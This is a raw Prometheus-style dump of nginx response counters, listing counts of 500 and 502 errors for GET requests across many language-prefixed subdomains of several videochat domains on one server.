nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="www.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="xh.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="zh.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="af.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="af.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="af.videochat.tv.br"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="af.videochat.world"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="al.videochat.cafe"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="al.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="al.videochat.tv.br"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="al.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="am.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="am.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ar.videochat.tv.br"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ar.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="az.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="az.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="az.videochat.tv.br"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="az.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ba.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ba.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ba.videochat.tv.br"} 195 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ba.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="be.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="be.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="be.videochat.tv.br"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="be.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bg.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bg.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bg.videochat.tv.br"} 94 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bg.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bn.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bn.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bn.videochat.tv.br"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bs.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bs.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bs.videochat.tv.br"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bs.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ca.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ca.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ca.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ca.videochat.world"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ceb.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ceb.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ceb.videochat.tv.br"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ceb.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="chm.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="chm.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="chm.videochat.tv.br"} 120 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="chm.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cs.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cs.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cs.videochat.tv.br"} 116 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cs.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cy.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cy.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cy.videochat.tv.br"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cy.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="da.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="da.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="da.videochat.tv.br"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="da.videochat.world"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="de.videochat.cafe"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="de.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="de.videochat.tv.br"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="de.videochat.world"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ee.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ee.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ee.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ee.videochat.world"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="el.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="el.videochat.tv.br"} 229 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="el.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="en.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="en.videochat.tv.br"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eo.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eo.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eo.videochat.tv.br"} 97 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eo.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="es.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="es.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="es.videochat.tv.br"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="es.videochat.world"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="et.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="et.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="et.videochat.tv.br"} 252 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eu.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eu.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eu.videochat.tv.br"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eu.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fa.videochat.tv.br"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fa.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fi.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fi.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fi.videochat.tv.br"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fi.videochat.world"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fr.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fr.videochat.tv.br"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fr.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ga.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ga.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ga.videochat.tv.br"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ga.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="gl.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="gl.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="gl.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="gl.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="gu.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="gu.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="he.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="he.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="he.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hi.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hi.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hi.videochat.tv.br"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hr.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hr.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hr.videochat.tv.br"} 145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hr.videochat.world"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ht.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ht.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ht.videochat.tv.br"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ht.videochat.world"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hu.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hu.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hu.videochat.tv.br"} 133 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hu.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="id.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="id.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="id.videochat.tv.br"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="id.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="is.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="is.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="is.videochat.tv.br"} 280 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="is.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="it.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="it.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="it.videochat.tv.br"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="it.videochat.world"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jp.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jp.videochat.tv.br"} 249 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jp.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jv.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jv.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jv.videochat.tv.br"} 272 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jv.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="kk.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="kk.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="kk.videochat.tv.br"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="km.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="km.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="kn.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="kn.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="kn.videochat.tv.br"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ko.videochat.tv.br"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ko.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ky.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ky.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ky.videochat.tv.br"} 102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ky.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lb.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lb.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lb.videochat.tv.br"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lb.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lo.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lo.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lo.videochat.tv.br"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lt.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lt.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lt.videochat.tv.br"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lt.videochat.world"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lv.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lv.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lv.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lv.videochat.world"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mg.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mg.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mg.videochat.tv.br"} 462 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mg.videochat.world"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mi.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mi.videochat.tv.br"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mi.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mk.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mk.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mk.videochat.tv.br"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ml.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mn.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mn.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mn.videochat.tv.br"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mn.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mr.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mr.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mr.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mrj.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mrj.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mrj.videochat.tv.br"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mrj.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ms.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ms.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ms.videochat.tv.br"} 515 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ms.videochat.world"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mt.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mt.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mt.videochat.tv.br"} 191 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mt.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="my.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="my.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ne.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ne.videochat.tv.br"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ne.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="nl.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="nl.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="nl.videochat.tv.br"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="nl.videochat.world"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="no.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="no.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="no.videochat.tv.br"} 192 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="no.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pa.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pa.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pa.videochat.tv.br"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pap.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pap.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pap.videochat.tv.br"} 210 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pap.videochat.world"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pl.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pl.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pl.videochat.tv.br"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pl.videochat.world"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pt.videochat.cafe"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pt.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pt.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ro.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ro.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ro.videochat.tv.br"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ro.videochat.world"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sco.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sco.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sco.videochat.tv.br"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sco.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="si.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="si.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="si.videochat.tv.br"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="si.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sk.videochat.cafe"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sk.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sk.videochat.tv.br"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sk.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sl.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sl.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sl.videochat.tv.br"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sl.videochat.world"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sr.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sr.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sr.videochat.tv.br"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sr.videochat.world"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="su.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="su.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="su.videochat.tv.br"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="su.videochat.world"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sv.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sv.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sv.videochat.tv.br"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sv.videochat.world"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sw.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sw.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sw.videochat.tv.br"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sw.videochat.world"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ta.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ta.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ta.videochat.tv.br"} 190 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ta.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="te.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="te.videochat.tv.br"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="te.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tg.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tg.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tg.videochat.tv.br"} 55 